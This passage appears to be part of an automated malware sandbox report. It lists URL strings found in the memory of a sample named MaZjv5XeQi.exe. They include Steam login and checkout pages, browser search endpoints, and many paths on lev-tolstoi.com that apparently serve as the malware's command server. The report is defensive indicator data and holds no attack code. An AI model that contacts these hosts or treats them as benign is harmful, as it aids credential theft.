                Source: MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.steampowered.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F5D000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://avatars.fastly.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.admarketplace.net/ctp?version=16.0.0&key=1696425136400800000.2&ci=1696425136743.
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://bridge.sfo1.ap01.net/ctp?version=16.0.0&key=1696425136400800000.1&ci=1696425136743.12791&cta
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.fastly.(
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampow
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://checkout.steampowered.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.f
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=Lj6X7NKUMfzk&a
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/globalv2.css?v=hzEgqbtRcI5V&l=english&_c
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/promo/summer2017/stickers.css?v=Ncr6N09yZIap&amp
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/header.css?v=EM4kCu67DNda&l=english&a
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/modalContent.css?v=WXAusLHclDIt&l=eng
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/css/skin_1/profilev2.css?v=fe66ET2uI50l&l=englis
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133421540.0000000000FF3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=_92TWn81
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F5C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=FRRi
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalContent.js?v=uqf5ttWTRe7l&l=engl
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/modalv2.js?v=zBXEuexVQ0FZ&l=english&a
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/profile.js?v=GeQ6v03mWpAc&l=english&a
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/promo/stickers.js?v=CcLRHsa04otQ&l=en
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/reportedcontent.js?v=-lZqrarogJr8&l=e
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/webui/clientcom.js?v=oOCAGrkRfpQ6&l=e
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=wuA4X_n5-mo0&l=en
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/u1AuJcj32cbVUf9NjMipLXEYwu2uFIt4lsj-ccwVqEs.36904.jpg
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: MaZjv5XeQi.exe, 00000000.00000003.2134675716.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134560297.000000000575B000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2134507540.000000000575E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2109950925.0000000000FE5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.sth
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AB000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4p8dfCfm4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
                Source: MaZjv5XeQi.exe, 00000000.00000003.2240279376.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286575761.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/5
                Source: MaZjv5XeQi.exe, 00000000.00000003.2233252191.00000000057B0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/MSWznTY69wwRW38B95
                Source: MaZjv5XeQi.exe, 00000000.00000003.2183906163.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2182870338.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2207101478.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2181402365.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206927029.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206818863.00000000057AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/MSWznTY69wwRW38B95-
                Source: MaZjv5XeQi.exe, 00000000.00000003.2180876019.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2180972685.00000000057AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/MSWznTY69wwRW38B95y2
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209596373.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2233422671.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/PPL
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FE1000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286575761.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/U
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/V4
                Source: MaZjv5XeQi.exe, 00000000.00000003.2207101478.00000000057AF000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206927029.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2206818863.00000000057AC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/WC
                Source: MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2158093066.000000000579D000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2158038574.000000000579B000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api
                Source: MaZjv5XeQi.exe, 00000000.00000003.2180876019.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2180972685.00000000057AC000.00000004.00000800.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2181402365.00000000057AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/api0GUP
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288412972.0000000000F8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apia3
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F7A000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F7A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apih3
                Source: MaZjv5XeQi.exe, 00000000.00000003.2286706213.0000000000FFE000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apis
                Source: MaZjv5XeQi.exe, 00000000.00000003.2233712383.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apita
                Source: MaZjv5XeQi.exe, 00000000.00000003.2233712383.0000000000FFE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/apixI
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F62000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/pi
                Source: MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/piy7
                Source: MaZjv5XeQi.exe, 00000000.00000003.2233422671.0000000000FE9000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2240279376.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/sy7
                Source: MaZjv5XeQi.exe, 00000000.00000002.2288722438.0000000000FF0000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286575761.0000000000FE3000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2286634992.0000000000FEE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com/u
                Source: MaZjv5XeQi.exe, 00000000.00000003.2256416712.0000000000FCF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lev-tolstoi.com:443/api
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steamp
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaizedH
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
                Source: MaZjv5XeQi.exe, 00000000.00000003.2209761021.0000000000FCB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamai
                Source: MaZjv5XeQi.exe, 00000000.00000003.2110141184.0000000000F91000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133467310.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2110007130.0000000000F8F000.00000004.00000020.00020000.00000000.sdmp, MaZjv5XeQi.exe, 00000000.00000003.2133542183.0000000000F91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
